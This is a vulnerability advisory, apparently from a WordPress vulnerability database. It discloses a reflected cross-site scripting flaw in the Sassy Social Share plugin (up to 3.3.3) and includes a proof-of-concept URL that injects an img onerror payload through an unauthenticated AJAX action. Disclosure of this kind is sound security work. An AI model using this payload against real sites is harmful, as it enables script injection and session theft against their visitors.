WordPress Plugin Vulnerabilities
Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS)
Description
AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
Proof of Concept
PoC URL (uses unauthenticated action "heateor_sss_sharing_count"): http://WORDPRESS_DOMAIN_HERE/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]= Other authenticated AJAX actions may also lead to reflected XSS, but not tested.
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Nicholas Mun
Submitter
Nicholas Mun
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2019-11-17 (about 4 years ago)
Added
2019-11-18 (about 4 years ago)
Last Updated
2019-11-25 (about 4 years ago)